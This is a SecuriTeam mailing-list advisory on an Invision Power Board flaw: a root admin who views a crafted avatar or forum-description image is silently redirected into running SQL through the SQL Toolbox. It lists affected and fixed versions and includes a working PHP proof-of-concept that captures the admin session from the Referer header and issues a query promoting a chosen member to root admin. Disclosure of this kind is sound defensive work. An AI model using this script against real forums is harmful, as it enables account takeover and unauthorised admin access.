The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Invision Power Board Multiple Vulnerabilities (Toolbox SQL)
------------------------------------------------------------------------
SUMMARY
An attack exists where an admin can be redirected and forced to execute
SQL commands through IPB's SQL Toolbox.
DETAILS
Vulnerable Systems:
* Invision Power Board 2.0.x
* Invision Power Board 2.1.0 - 2.1.7
* Invision Power Board 2.2 Beta 1
Immune Systems:
* Invision Power Board 2.1.7 (ID: 21013.61005.s)
* Invision Power Board 2.2 Beta 2
The following requirements must be met for this attack to take place:
- The database table prefix must be known
- The admin must have access to the SQL Toolbox (any "root admin")
- The admin must have images and referers turned on in their browser, and
their browser must follow Location headers (default behavior for most
browsers)
- The admin must view a malicious script as an image in their browser
This attack works invisibly to the admin because only the image is
redirected, not the page.
1st method:
In this method, any user can force the admin to execute SQL commands.
1. A user sets their avatar to the malicious script's address
2. The admin looks up the user's account in the Admin CP
3. The user's avatar is shown and the admin is redirected....
2nd method:
A restricted admin can add any HTML to a forum's description(including
javascript).
1. A restricted admin adds the malicious script as an image to a forum's
description.
2. Upon going to the "Manage Forums" link in Admin CP, an unrestricted
admin will be redirected and the SQL will be executed.
Example malicious image script:
<?php
//The member id to promote to root admin
$mid = 145;
//The database prefix (usually "ibf_")
$prefix = "ibf_";
if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql&code=runsql&query=" .
"UPDATE+{$prefix}members+SET+mgroup%3D4+". "where+id%3D{$mid}+LIMIT+1");
}
?>
ADDITIONAL INFORMATION
The information has been provided by <mailto:rapigator@yahoo.com>
Rapigator.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
